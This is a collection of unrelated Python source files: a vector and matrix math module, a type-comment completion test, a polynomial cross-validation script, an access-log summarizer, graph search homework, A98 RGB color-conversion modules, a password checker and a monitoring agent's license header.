    def __rmatmul__(self, other: 'Vec') -> 'Vec': ...
    def __rmatmul__(self, other):
        """Vec @ Angle rotates the first by the second."""
        if isinstance(other, Py_Vec):
            return other @ Py_Matrix.from_angle(self)
        elif isinstance(other, Py_Angle):
            # Should always be done by __mul__!
            return self._rotate_angle(other)
        return NotImplemented

    def _rotate_angle(self, target: 'Angle') -> 'Angle':
        """Rotate the target by this angle.

        Inefficient if we have more than one rotation to do.
        """
        mat = Py_Matrix.from_angle(target)
        mat @= self
        return mat.to_angle()

    @contextlib.contextmanager
    def transform(self) -> Iterator[Matrix]:
        """Perform transformations on this angle.

        Used as a context manager, which returns a matrix.
        When the body is exited safely, the matrix is applied to
        the angle.
        """
        mat = Py_Matrix.from_angle(self)
        yield mat
        # Only reached when no exception escaped the with-body.
        new_ang = mat.to_angle()
        self._pitch = new_ang._pitch
        self._yaw = new_ang._yaw
        self._roll = new_ang._roll
def _mk_vec(x: float, y: float, z: float) -> Vec:
    """Unpickle a Vec object, maintaining compatibility with C versions.

    Shortened name shrinks the data size.
    """
    # Bypass __init__'s checks and coercion/iteration: write the slots directly.
    vec = Vec.__new__(Vec)
    vec.x, vec.y, vec.z = x, y, z
    return vec
def _mk_ang(pitch: float, yaw: float, roll: float) -> Angle:
    """Unpickle an Angle object, maintaining compatibility with C versions.

    Shortened name shrinks the data size.
    """
    # Skips __init__, though the assignments still pass through the
    # pitch/yaw/roll property setters (which normalise into 0-360).
    ang = Angle.__new__(Angle)
    ang.pitch, ang.yaw, ang.roll = pitch, yaw, roll
    return ang
def _mk_mat(
    aa: float, ab: float, ac: float,
    ba: float, bb: float, bc: float,
    ca: float, cb: float, cc: float,
) -> Matrix:
    """Unpickle a Matrix object, maintaining compatibility with C versions.

    Shortened name shrinks the data size.
    """
    # Skip __init__'s identity fill; write each cell via __setitem__.
    mat = Matrix.__new__(Matrix)
    values = iter((aa, ab, ac, ba, bb, bc, ca, cb, cc))
    for row in (0, 1, 2):
        for col in (0, 1, 2):
            mat[row, col] = next(values)
    return mat
# Older name.
_mk = _mk_vec

# A little dance to import both the Cython and Python versions,
# and choose an appropriate unprefixed version.
# Py_* always refer to the pure-Python classes above; Cy_* start as the
# same objects and are swapped for the compiled versions if available.
Cy_Vec = Py_Vec = Vec
Cy_parse_vec_str = Py_parse_vec_str = parse_vec_str
Cy_to_matrix = Py_to_matrix = to_matrix
Cy_lerp = Py_lerp = lerp
Cy_Angle = Py_Angle = Angle
Cy_Matrix = Py_Matrix = Matrix

# Do it this way, so static analysis ignores this.
_glob = globals()
del _glob['SupportsRound']
try:
    from srctools import _math # type: ignore
except ImportError:
    # No compiled extension available - keep the pure-Python versions.
    # NOTE(review): _glob is only deleted on the compiled path below, so
    # it lingers in the module namespace when this branch is taken.
    pass
else:
    # Replace the unprefixed and Cy_ names with the compiled versions.
    for _name in ['Vec', 'Angle', 'Matrix', 'parse_vec_str', 'to_matrix', 'lerp']:
        _glob[_name] = _glob['Cy_' + _name] = getattr(_math, _name)
    del _glob, _name, _math
| {
"repo_name": "TeamSpen210/srctools",
"path": "srctools/math.py",
"copies": "1",
"size": "59679",
"license": "unlicense",
"hash": -2966240907222309400,
"line_mean": 31.6650246305,
"line_max": 107,
"alpha_frac": 0.5255449991,
"autogenerated": false,
"ratio": 3.5210926898342083,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4546637688934208,
"avg_score": null,
"num_lines": null
} |
# Test fixture for PEP 484 "# type:" comments.  The "#?" comment lines
# apparently encode the expected inferred type of the expression on the
# following line, so do not insert anything between a "#?" marker and
# its target expression.
a = 3 # type: str
#? str()
a
b = 3 # type: str but I write more
#? int()
b
c = 3 # type: str # I comment more
#? str()
c
d = "It should not read comments from the next line"
# type: int
#? str()
d
# type: int
e = "It should not read comments from the previous line"
#? str()
e
class BB: pass
def test(a, b):
    a = a # type: BB
    c = a # type: str
    d = a
    # type: str
    e = a # type: str # Should ignore long whitespace
    #? BB()
    a
    #? str()
    c
    #? BB()
    d
    #? str()
    e
a,b = 1, 2 # type: str, float
#? str()
a
#? float()
b
class Employee:
    pass
# The typing library is not installable for Python 2.6, therefore ignore the
# following tests.
# python >= 2.7
from typing import List
x = [] # type: List[Employee]
#? Employee()
x[1]
x, y, z = [], [], [] # type: List[int], List[int], List[str]
#? int()
y[2]
x, y, z = [], [], [] # type: (List[float], List[float], List[BB])
for zi in z:
    #? BB()
    zi
x = [
    1,
    2,
] # type: List[str]
#? str()
x[1]
for bar in foo(): # type: str
    #? str()
    bar
for bar, baz in foo(): # type: int, float
    #? int()
    bar
    #? float()
    baz
for bar, baz in foo():
    # type: str, str
    """ type hinting on next line should not work """
    #?
    bar
    #?
    baz
with foo(): # type: int
    ...
with foo() as f: # type: str
    #? str()
    f
with foo() as f:
    # type: str
    """ type hinting on next line should not work """
    #?
    f
aaa = some_extremely_long_function_name_that_doesnt_leave_room_for_hints() \
    # type: float # We should be able to put hints on the next line with a \
#? float()
aaa
| {
"repo_name": "NcLang/vimrc",
"path": "sources_non_forked/YouCompleteMe/third_party/ycmd/third_party/JediHTTP/vendor/jedi/test/completion/pep0484_comments.py",
"copies": "2",
"size": "1669",
"license": "mit",
"hash": -6595779478990166000,
"line_mean": 14.3119266055,
"line_max": 79,
"alpha_frac": 0.5176752546,
"autogenerated": false,
"ratio": 2.727124183006536,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4244799437606536,
"avg_score": null,
"num_lines": null
} |
# Sample [x, y] data points used for the polynomial fit.
a = [-5,9]
b = [-4,7]
c = [-3,4]
d = [-2,2]
e = [-1,1]
f = [0,0]
g = [1,1]
h = [2,2]
i = [3,4]
j = [4,7]
k = [5,9]
l = [6,12]
# All twelve points together.
A = [a,b,c,d,e,f,g,h,i,j,k,l]
def Transpose(A):
    """Return the transpose of the 2-D list A (rows become columns)."""
    rows = len(A)
    cols = len(A[0])
    return [[A[r][c] for r in range(rows)] for c in range(cols)]
# Three folds of four points each for cross-validation.
first = [l,i,e,b]
second = [d,j,f,a]
third = [h,c,g,k]
# Each training set combines two folds ...
c1 = first + second
c2 = first + third
c3 = second + third
# ... and the remaining fold is the matching test set (same index).
train = [c1,c2,c3]
test = [third,second,first]
def poly(A, degree):
    """Return A raised to the given power; poly(A, d) == A**d for d >= 0.

    Non-positive degrees return 1, matching the recursive original.
    """
    result = 1
    for _ in range(degree):
        result = A * result
    return result
def function(A, degree):
    """Build the design matrix: one row [1, x, x^2, ..., x^degree] per point.

    A is a list of [x, y] points; only the x value (element 0) is used.
    """
    design = []
    for point in A:
        x_val = point[0]
        row = [1]
        power = 1
        for _ in range(degree):
            # Same multiplication order as the recursive power helper.
            power = x_val * power
            row.append(power)
        design.append(row)
    return design
def squared_error(test_y, output):
    """Sum of squared differences between actual y values and predictions."""
    return sum(
        (test_y[i][1] - predicted) ** 2
        for i, predicted in enumerate(output)
    )
def test_y(test_y,coef,order):
l1 = []
for i in test_y:
y = 0
for j in range(order+1):
y += coef[j][0]*poly(i[0],j)
l1.append(y)
return l1
def Matrix_multip(A, B):
    """Multiply matrix A by matrix/column-vector B (nested lists).

    Prints a message and returns None when the shapes are incompatible.
    """
    # A bare scalar row has no len(); treat it as a single column.
    try:
        a_cols = len(A[0])
    except:
        a_cols = 1
    try:
        b_cols = len(B[0])
    except:
        b_cols = 1
    if a_cols != len(B):
        print('No valid multiplication')
        return
    return [Single_row_multip(row, B, b_cols) for row in A]
def Single_row_multip(row, B, Bl):
    """Dot one matrix row with B.

    When Bl is 1, B is a column vector and a one-element list is returned;
    otherwise the result has one entry per column of B.
    """
    if Bl == 1:
        total = 0
        for i in range(len(B)):
            total += row[i] * B[i][0]
        return [total]
    result = []
    for col in range(Bl):
        total = 0
        for i in range(len(B)):
            total += row[i] * B[i][col]
        result.append(total)
    return result
def Vector_b(A):
    """Extract the y values of the points as a column vector of floats."""
    return [[float(point[1])] for point in A]
def Adjoin(A, order):
    """Append an (order+1)-sized identity block to the right of A, in place.

    Returns the same (mutated) list for convenience.
    """
    size = order + 1
    offset = len(A)  # original column count equals the row count here
    for row_index in range(size):
        A[row_index].extend([0] * size)
    for row_index in range(size):
        A[row_index][row_index + offset] = 1
    return A
def Inverse(A, order):
    """Invert the left (order+1) square block of the adjoined matrix A.

    A must be the output of Adjoin(): [M | I].  Gauss-Jordan style
    elimination without pivot swapping, so a zero entry in a pivot
    column divides by zero.  Returns the right half of A (now M^-1);
    A itself is mutated.
    """
    for pivot in range(order+1):
        # Scale every row so its entry in the pivot column becomes 1 ...
        for i in range(order+1):
            temp = A[i][pivot]
            for j in range((order+1)*2):
                A[i][j] /= temp
        # ... then subtract the pivot row from all other rows.
        for i in range(order+1):
            if i != pivot:
                for j in range((order+1)*2):
                    A[i][j] -= A[pivot][j]
    # Re-normalise each row by its diagonal entry.
    for pivot in range(order+1):
        temp = A[pivot][pivot]
        for i in range(len(A[0])):
            A[pivot][i] /= temp
    # Copy out the right-hand block (columns order+1 .. 2*(order+1)-1).
    l1 = []
    for i in range(order+1):
        l2 = []
        for j in range(order+1):
            value = A[i][j+order+1]
            l2.append(value)
        l1.append(l2)
    return l1
def show(A):
    """Print each row of A, followed by a blank separator line."""
    for row in A:
        print(row)
    print("\n")
def main(train, test):
    """Fit polynomials of order 1..7 on each training fold and print the
    order with the smallest mean squared error on the matching test fold.

    train and test are parallel lists of folds ([x, y] point lists).
    """
    first_assignment = True
    for order in range(1, 8):
        error = 0
        count = 0
        for j in train:
            c = j
            # Normal-equation least squares: x = (C^T C)^-1 (C^T b).
            b = Vector_b(c)
            # show(b)
            c1 = function(c, order)
            # show(c1)
            c1t = Transpose(c1)
            # show(c1t)
            c1m = Matrix_multip(c1t, c1)
            # show(c1m)
            c1a = Adjoin(c1m, order)
            # show(c1a)
            ci = Inverse(c1m, order)
            # show(ci)
            cs = Matrix_multip(c1t, b)
            # show(cs)
            x = Matrix_multip(ci, cs)
            # show(x)
            # Evaluate on the test fold paired with this training fold.
            i = test[count]
            output_y = test_y(i, x, order)
            # show(output_y)
            error += squared_error(i, output_y)
            count += 1
        mean_error = error/len(test)
        if first_assignment:
            # Seed best-so-far with the first order tried.
            smallest = mean_error
            best_order = order
            first_assignment = False
        if smallest > mean_error:
            smallest = mean_error
            best_order = order
    print("the best order to fit the data is {}\n".format(best_order))
main(train,test)
| {
"repo_name": "newmangonzala/Python-Projects",
"path": "crossValidation.py",
"copies": "1",
"size": "4258",
"license": "mit",
"hash": 5514317151605293000,
"line_mean": 20.8358974359,
"line_max": 70,
"alpha_frac": 0.4560826679,
"autogenerated": false,
"ratio": 2.878972278566599,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.38350549464665995,
"avg_score": null,
"num_lines": null
} |
# Python 2 script: counts (ip, url, status) occurrences in an access log
# and writes the top 10 as text and as an HTML table.
#a='61.159.140.123 - - [23/Aug/2014:00:01:42 +0800] "GET /favicon.ico HTTP/1.1" 404 \ "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.66 Safari/537.36 LBBROWSER" "-"'
line_dict={}
line = open('www_access.log','r')
for i in line:
    # Fields 0/6/8 of a combined-format log line: client IP, URL, status.
    b= i.split(' ')
    key = (b[0],b[6],b[8])
    line_dict[key] = line_dict.get(key,0) + 1
# key = (ip,url,code)
# if key not in line_dict:
#     line_dict[key] = 0
# line_dict[key] += 1
line.close()
#print line_dict
# Python 2: dict.items() returns a plain list, which is mutated below.
line_list = line_dict.items()
#[(key,value),(key,value)]
# Ten bubble-sort passes: enough to push the ten largest counts to the end.
for j in range(10):
    for i in range(len(line_list) - 1):
        if line_list[i][1] > line_list[i + 1][1]:
            temp = line_list[i]
            line_list[i] = line_list[i + 1]
            line_list[i + 1] = temp
html=open('top_log.txt','w')
#print line_list[-1:-11:-1]
# Walk the last ten entries in reverse, i.e. largest counts first.
for node in line_list[-1:-11:-1]:
    html.write('%s %s %s %s \n' % (node[1],node[0][0],node[0][1],node[0][2]))
html.close()
# NOTE(review): the template's <trade> tag is never closed and </thead>
# has no opening tag - runtime output, left untouched here.
html1='''
<!DOCTYPE html>
<html>
<head>
<meta charset='utf-8'/>
<title>{biaoti}</title>
</head>
<body>
<table>
<trade>
<tr>
{kaitou}
</tr>
</thead>
<tbody>
<tr>
{ruilong}
</tr>
</tbody>
</table>
</body>
</html>
'''
biaoti='top_10'
kaitou='<th>cishu</th><th>IP</th><th>URL</th><th>Code</th>'
ruilong=''
# NOTE(review): top_log10.html is opened twice; the first handle is
# leaked (never written or closed) and the second truncates the file.
html2=open('top_log10.html','w')
for node in line_list[-1:-11:-1]:
    ruilong +='<tr><td>%s</td> <td>%s</td> <td>%s</td> <td>%s</td></tr>' % (node[1],node[0][0],node[0][1],node[0][2])
html2=open('top_log10.html','w')
html2.write(html1.format(biaoti=biaoti,kaitou=kaitou,ruilong=ruilong))
html2.close()
| {
"repo_name": "51reboot/actual_09_homework",
"path": "03/xionghuihui/top_log10.py",
"copies": "1",
"size": "1772",
"license": "mit",
"hash": -8426590600778502000,
"line_mean": 27.5806451613,
"line_max": 208,
"alpha_frac": 0.5101580135,
"autogenerated": false,
"ratio": 2.5170454545454546,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.35272034680454545,
"avg_score": null,
"num_lines": null
} |
# Edge weights for problem1's graph: negative log-probabilities, so the
# cheapest path corresponds to the most probable sequence.
A = 6.9107755 # -ln(0.001)
B = 4.7105307 # -ln(0.009)
C = 2.5133061 # -ln(0.081)
D = 0.3160815 # -ln(0.729)
# Accumulates [total_distance, path] entries produced by find_paths().
routes = []
def dijkstra(graph, src, dest, visited=None, distances=None, predecessors=None):
    """Recursively run Dijkstra's algorithm and print the shortest path.

    graph -- dict mapping node -> {neighbor: edge_cost}
    src, dest -- start and target node keys
    visited, distances, predecessors -- internal recursion state; leave as
        None for a fresh search.  (The original used mutable default
        arguments ``[]``/``{}``, so a second call with defaults silently
        reused the state of the first -- fixed with None sentinels.)

    Raises TypeError when src or dest is not a node of graph.
    """
    if visited is None:
        visited = []
    if distances is None:
        distances = {}
    if predecessors is None:
        predecessors = {}
    if src not in graph:
        raise TypeError('The root of the shortest path tree cannot be found')
    if dest not in graph:
        raise TypeError('The target of the shortest path cannot be found')
    if src == dest:
        # Arrived: walk the predecessor chain back to the start and report.
        path = []
        pred = dest
        while pred is not None:
            path.append(pred)
            pred = predecessors.get(pred, None)
        print('shortest path: ' + str(path) + " cost=" + str(distances[dest]))
    else:
        if not visited:
            distances[src] = 0  # first call: the source is at distance zero
        # Relax every edge leaving src.
        for neighbor in graph[src]:
            if neighbor not in visited:
                new_distance = distances[src] + graph[src][neighbor]
                if new_distance < distances.get(neighbor, float('inf')):
                    distances[neighbor] = new_distance
                    predecessors[neighbor] = src
        visited.append(src)
        # Recurse on the cheapest not-yet-visited node.
        unvisited = {}
        for k in graph:
            if k not in visited:
                unvisited[k] = distances.get(k, float('inf'))
        x = min(unvisited, key=unvisited.get)
        dijkstra(graph, x, dest, visited, distances, predecessors)
def problem1():
    # Layered trellis from 's' to 't'; edge weights are the negative
    # log-probability constants A-D defined above, so the printed shortest
    # path is the most probable state sequence.
    # NOTE: key insertion order matters -- dijkstra() breaks distance ties
    # by dict iteration order, so this literal must not be reordered.
    graph = {'s': {'a': 0},
             'a': {'b': B, 'c': A},
             'b': {'d': B, 'e': C},
             'c': {'f': A, 'g': D},
             'd': {'h': B, 'i': C},
             'e': {'j': C, 'k': B},
             'f': {'h': B, 'i': C},
             'g': {'j': C, 'k': B},
             'h': {'l': D, 'm': A},
             'i': {'n': C, 'o': B},
             'j': {'l': B, 'm': C},
             'k': {'n': A, 'o': D},
             'l': {'t': 0},
             'm': {'t': 0},
             'n': {'t': 0},
             'o': {'t': 0},
             't': {},
             }
    dijkstra(graph, 's', 't')
def find_paths(node, cities, path, distance):
    # Depth-first enumeration of complete tours starting from `node`
    # (Python 2 code: print statement, dict.has_key).  Every finished tour
    # is printed and appended to the global `routes` as [distance, path].
    path.append(node)
    if len(path) > 1:
        # Add the edge that brought us to `node`.
        distance += cities[path[-2]][node]
    # All cities visited and an edge leads back to the start: close the tour.
    if (len(cities) == len(path)) and (cities[path[-1]].has_key(path[0])):
        global routes
        path.append(path[0])
        distance += cities[path[-2]][path[0]]
        print path, distance
        routes.append([distance, path])
        return
    # Recurse into every unvisited city reachable from here; copies of the
    # dict and path keep each branch of the search independent.
    for city in cities:
        if (city not in path) and (cities[city].has_key(node)):
            find_paths(city, dict(cities), list(path), distance)
def problem2():
    # Brute-force travelling salesman over an asymmetric distance table:
    # enumerate every round trip starting at 'A', then report the cheapest
    # tour collected in the global `routes` (Python 2 print statements).
    cities = {
        'A': {'B': 6, 'C': 2, 'D': 2, 'E': 3},
        'B': {'A': 2, 'C': 4, 'D': 3, 'E': 7},
        'C': {'A': 5, 'B': 3, 'D': 2, 'E': 1},
        'D': {'A': 1, 'B': 9, 'C': 4, 'E': 3},
        'E': {'A': 3, 'B': 7, 'C': 3, 'D': 5},
    }
    print "Start: A"
    find_paths('A', cities, [], 0)
    print "\n"
    # Sorting [distance, path] pairs puts the shortest tour first.
    routes.sort()
    if len(routes) != 0:
        print "Shortest route: %s" % routes[0]
    else:
        print "FAILED"
def main():
    # Run both homework exercises in order.
    problem1()
    problem2()

if __name__ == '__main__':
    main()
| {
"repo_name": "LittleBun/Personal",
"path": "EE618/hw2.py",
"copies": "1",
"size": "3058",
"license": "unlicense",
"hash": -237437106050191650,
"line_mean": 28.6893203883,
"line_max": 78,
"alpha_frac": 0.4401569653,
"autogenerated": false,
"ratio": 3.1689119170984457,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.41090688823984456,
"avg_score": null,
"num_lines": null
} |
"""A98 RGB color class."""
from ._space import RE_DEFAULT_MATCH
from .srgb import SRGB
from .xyz import XYZ
from . import _convert as convert
from .. import util
import re
import math
def lin_a98rgb_to_xyz(rgb):
    """Map linear-light a98-rgb values to CIE XYZ.

    The matrix uses the derivation from
    http://www.brucelindbloom.com/index.html?Eqn_RGB_XYZ_Matrix.html
    which carries greater numerical precision than section 4.3.5.3 of
    https://www.adobe.com/digitalimag/pdfs/AdobeRGB1998.pdf
    so no further chromatic adaptation is required here.
    """
    matrix = [
        [0.5766690429101305, 0.1855582379065463, 0.1882286462349947],
        [0.29734497525053605, 0.6273635662554661, 0.07529145849399788],
        [0.02703136138641234, 0.07068885253582723, 0.9913375368376388]
    ]
    return util.dot(matrix, rgb)
def xyz_to_lin_a98rgb(xyz):
    """Map CIE XYZ to linear-light a98-rgb (inverse of lin_a98rgb_to_xyz)."""
    matrix = [
        [2.0415879038107465, -0.5650069742788596, -0.34473135077832956],
        [-0.9692436362808795, 1.8759675015077202, 0.04155505740717557],
        [0.013444280632031142, -0.11836239223101838, 1.0151749943912054]
    ]
    return util.dot(matrix, xyz)
def lin_a98rgb(rgb):
    """Decode gamma-corrected a98-rgb channels (0.0 - 1.0) to linear light.

    copysign keeps negative (out-of-gamut) channel values negative.
    """
    decoded = []
    for channel in rgb:
        decoded.append(math.copysign(abs(channel) ** (563 / 256), channel))
    return decoded
def gam_a98rgb(rgb):
    """Encode linear-light a98-rgb channels (0.0 - 1.0) with the gamma curve.

    copysign keeps negative (out-of-gamut) channel values negative.
    """
    encoded = []
    for channel in rgb:
        encoded.append(math.copysign(abs(channel) ** (256 / 563), channel))
    return encoded
class A98RGB(SRGB):
    """A98 RGB color space, D65 white point."""

    SPACE = "a98-rgb"
    # Regex recognizing the generic serialization for this space.
    DEFAULT_MATCH = re.compile(RE_DEFAULT_MATCH.format(color_space=SPACE))
    WHITE = convert.WHITES["D65"]

    @classmethod
    def _to_xyz(cls, rgb):
        """Gamma-corrected a98-rgb -> XYZ: linearize, apply the RGB->XYZ
        matrix, then chromatically adapt to the XYZ white point."""
        return cls._chromatic_adaption(cls.white(), XYZ.white(), lin_a98rgb_to_xyz(lin_a98rgb(rgb)))

    @classmethod
    def _from_xyz(cls, xyz):
        """XYZ -> gamma-corrected a98-rgb (inverse of ``_to_xyz``)."""
        return gam_a98rgb(xyz_to_lin_a98rgb(cls._chromatic_adaption(XYZ.white(), cls.white(), xyz)))
| {
"repo_name": "dmilith/SublimeText3-dmilith",
"path": "Packages/mdpopups/st3/mdpopups/coloraide/colors/a98_rgb.py",
"copies": "1",
"size": "2071",
"license": "mit",
"hash": -6456953194400418000,
"line_mean": 28.1690140845,
"line_max": 104,
"alpha_frac": 0.6619990343,
"autogenerated": false,
"ratio": 2.7798657718120805,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8939081012354723,
"avg_score": 0.000556758751471583,
"num_lines": 71
} |
"""A98 RGB color class."""
from ..spaces import RE_DEFAULT_MATCH
from ..spaces import _cat
from .srgb import SRGB
from .xyz import XYZ
from .. import util
import re
import math
def lin_a98rgb_to_xyz(rgb):
    """Map linear-light a98-rgb values to CIE XYZ.

    The matrix uses the derivation from
    http://www.brucelindbloom.com/index.html?Eqn_RGB_XYZ_Matrix.html
    which carries greater numerical precision than section 4.3.5.3 of
    https://www.adobe.com/digitalimag/pdfs/AdobeRGB1998.pdf
    so no further chromatic adaptation is required here.
    """
    matrix = [
        [0.5767308871981476, 0.1855539507112141, 0.1881851620906385],
        [0.2973768637115448, 0.6273490714522, 0.0752740648362554],
        [0.0270342603374131, 0.0706872193185578, 0.9911085203440293]
    ]
    return util.dot(matrix, rgb)
def xyz_to_lin_a98rgb(xyz):
    """Map CIE XYZ to linear-light a98-rgb (inverse of lin_a98rgb_to_xyz)."""
    matrix = [
        [2.04136897926008, -0.5649463871751959, -0.3446943843778484],
        [-0.9692660305051867, 1.8760108454466937, 0.0415560175303498],
        [0.0134473872161703, -0.1183897423541256, 1.0154095719504166]
    ]
    return util.dot(matrix, xyz)
def lin_a98rgb(rgb):
    """Decode gamma-corrected a98-rgb channels (0.0 - 1.0) to linear light.

    copysign keeps negative (out-of-gamut) channel values negative.
    """
    decoded = []
    for channel in rgb:
        decoded.append(math.copysign(abs(channel) ** (563 / 256), channel))
    return decoded
def gam_a98rgb(rgb):
    """Encode linear-light a98-rgb channels (0.0 - 1.0) with the gamma curve.

    copysign keeps negative (out-of-gamut) channel values negative.
    """
    encoded = []
    for channel in rgb:
        encoded.append(math.copysign(abs(channel) ** (256 / 563), channel))
    return encoded
class A98RGB(SRGB):
    """A98 RGB color space, D65 white point."""

    SPACE = "a98-rgb"
    # Regex recognizing the generic serialization for this space.
    DEFAULT_MATCH = re.compile(RE_DEFAULT_MATCH.format(color_space=SPACE))
    WHITE = _cat.WHITES["D65"]

    @classmethod
    def _to_xyz(cls, rgb):
        """Gamma-corrected a98-rgb -> XYZ: linearize, apply the RGB->XYZ
        matrix, then chromatically adapt to the XYZ white point."""
        return _cat.chromatic_adaption(cls.white(), XYZ.white(), lin_a98rgb_to_xyz(lin_a98rgb(rgb)))

    @classmethod
    def _from_xyz(cls, xyz):
        """XYZ -> gamma-corrected a98-rgb (inverse of ``_to_xyz``)."""
        return gam_a98rgb(xyz_to_lin_a98rgb(_cat.chromatic_adaption(XYZ.white(), cls.white(), xyz)))
| {
"repo_name": "facelessuser/sublime-markdown-popups",
"path": "st3/mdpopups/coloraide/spaces/a98_rgb.py",
"copies": "1",
"size": "2047",
"license": "mit",
"hash": -6484839432329325000,
"line_mean": 27.8309859155,
"line_max": 104,
"alpha_frac": 0.6580361505,
"autogenerated": false,
"ratio": 2.7737127371273713,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3931748887627371,
"avg_score": null,
"num_lines": null
} |
"""A98 RGB color class."""
from ..spaces import RE_DEFAULT_MATCH
from ..spaces import _cat
from .srgb import SRGB
from .xyz import XYZ
from .. import util
import re
def lin_a98rgb_to_xyz(rgb):
    """Map linear-light a98-rgb values to CIE XYZ.

    The matrix uses the derivation from
    http://www.brucelindbloom.com/index.html?Eqn_RGB_XYZ_Matrix.html
    which carries greater numerical precision than section 4.3.5.3 of
    https://www.adobe.com/digitalimag/pdfs/AdobeRGB1998.pdf
    so no further chromatic adaptation is required here.
    """
    matrix = [
        [0.5767308871981476, 0.1855539507112141, 0.1881851620906385],
        [0.2973768637115448, 0.6273490714522, 0.0752740648362554],
        [0.0270342603374131, 0.0706872193185578, 0.9911085203440293]
    ]
    return util.dot(matrix, rgb)
def xyz_to_lin_a98rgb(xyz):
    """Map CIE XYZ to linear-light a98-rgb (inverse of lin_a98rgb_to_xyz)."""
    matrix = [
        [2.04136897926008, -0.5649463871751959, -0.3446943843778484],
        [-0.9692660305051867, 1.8760108454466937, 0.0415560175303498],
        [0.0134473872161703, -0.1183897423541256, 1.0154095719504166]
    ]
    return util.dot(matrix, xyz)
def lin_a98rgb(rgb):
    """Decode gamma-corrected a98-rgb channels (0.0 - 1.0) to linear light.

    util.npow preserves the sign of negative (out-of-gamut) values.
    """
    decoded = []
    for channel in rgb:
        decoded.append(util.npow(channel, 563 / 256))
    return decoded
def gam_a98rgb(rgb):
    """Encode linear-light a98-rgb channels (0.0 - 1.0) with the gamma curve.

    util.npow preserves the sign of negative (out-of-gamut) values.
    """
    encoded = []
    for channel in rgb:
        encoded.append(util.npow(channel, 256 / 563))
    return encoded
class A98RGB(SRGB):
    """A98 RGB color space, D65 white point."""

    SPACE = "a98-rgb"
    # Regex recognizing the generic serialization for this space.
    DEFAULT_MATCH = re.compile(RE_DEFAULT_MATCH.format(color_space=SPACE))
    WHITE = _cat.WHITES["D65"]

    @classmethod
    def _to_xyz(cls, rgb):
        """Gamma-corrected a98-rgb -> XYZ: linearize, apply the RGB->XYZ
        matrix, then chromatically adapt to the XYZ white point."""
        return _cat.chromatic_adaption(cls.white(), XYZ.white(), lin_a98rgb_to_xyz(lin_a98rgb(rgb)))

    @classmethod
    def _from_xyz(cls, xyz):
        """XYZ -> gamma-corrected a98-rgb (inverse of ``_to_xyz``)."""
        return gam_a98rgb(xyz_to_lin_a98rgb(_cat.chromatic_adaption(XYZ.white(), cls.white(), xyz)))
| {
"repo_name": "facelessuser/ColorHelper",
"path": "lib/coloraide/spaces/a98_rgb.py",
"copies": "1",
"size": "1999",
"license": "mit",
"hash": -9157492764690160000,
"line_mean": 27.5571428571,
"line_max": 104,
"alpha_frac": 0.6588294147,
"autogenerated": false,
"ratio": 2.7610497237569063,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.39198791384569065,
"avg_score": null,
"num_lines": null
} |
# Sample passwords used to exercise the two checkio() implementations below.
a = 'A1213pokl'          # 9 chars: too short
b = 'bAse730onE'         # strong: length 10, mixed case plus digits
c = 'asasasasasasasaas'  # lowercase only
d = 'QWERTYqwerty'       # no digits
e = '123456123456'       # digits only
f = 'QwErTy911poqqqq'    # strong
#---------------My Solution-----------------#
def checkio(password):
    """Password strength check (exercise version).

    Returns True when the password is at least 10 characters long and
    contains a lowercase letter, an uppercase letter and a digit; False
    when a class is missing or any character is not alphanumeric; and the
    string "Password not long enough" for short passwords (quirky return
    type kept for compatibility with the original exercise).
    """
    if len(password) < 10:
        return "Password not long enough"
    lower_alphabet = "abcdefghijklmnopqrstuvwxyz"
    upper_alphabet = lower_alphabet.upper()
    has_lower = False
    has_upper = False
    has_digit = False
    for ch in password:
        if ch in lower_alphabet:
            has_lower = True
        elif ch in upper_alphabet:
            has_upper = True
        elif ch.isdigit():
            has_digit = True
        else:
            # Any character outside [a-zA-Z0-9] disqualifies the password.
            return False
    return has_lower and has_upper and has_digit
# Exercise the first solution with the strong sample password.
print (checkio(f))
#---------------Best Solution-----------------#
def checkio(data):
    """Return True if the password is strong and False if not.

    Strong means: at least 10 characters containing at least one numeric
    character, one uppercase letter and one lowercase letter.
    """
    has_num = any(ch.isnumeric() for ch in data)
    has_upper = any(ch.isupper() for ch in data)
    has_lower = any(ch.islower() for ch in data)
    return has_num and has_upper and has_lower and len(data) >= 10
print (checkio(f)) | {
"repo_name": "ismk/Python-Examples",
"path": "checkio.py",
"copies": "1",
"size": "1117",
"license": "mit",
"hash": 976909252119754500,
"line_mean": 21.3125,
"line_max": 53,
"alpha_frac": 0.57564906,
"autogenerated": false,
"ratio": 3.1914285714285713,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.42670776314285713,
"avg_score": null,
"num_lines": null
} |
# aa436.py
#
# This is the Agent for Project 436. An instance of aa436.py runs
# on every host to be monitored. After an aa436.py Agent is started it will:
# - Listen for UDP "I am here" broadcast notifications from ax436.py Servers.
# - Request configuration from the first ax436.py Server that it finds.
# - Commence monitoring for:
# o Pattern matches in log files.
# o Processes not running.
# o System resource limit breaches (eg. disk space, inode usage, memory, load)
# - The aa436.py Agent will send regular heartbeat messages to the ax436.py Server
# (if idle).
# - Reset and re-load its configuration if told to do so by the ax436.py Server.
# Copyright (c) 2013, Chris Bristow
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
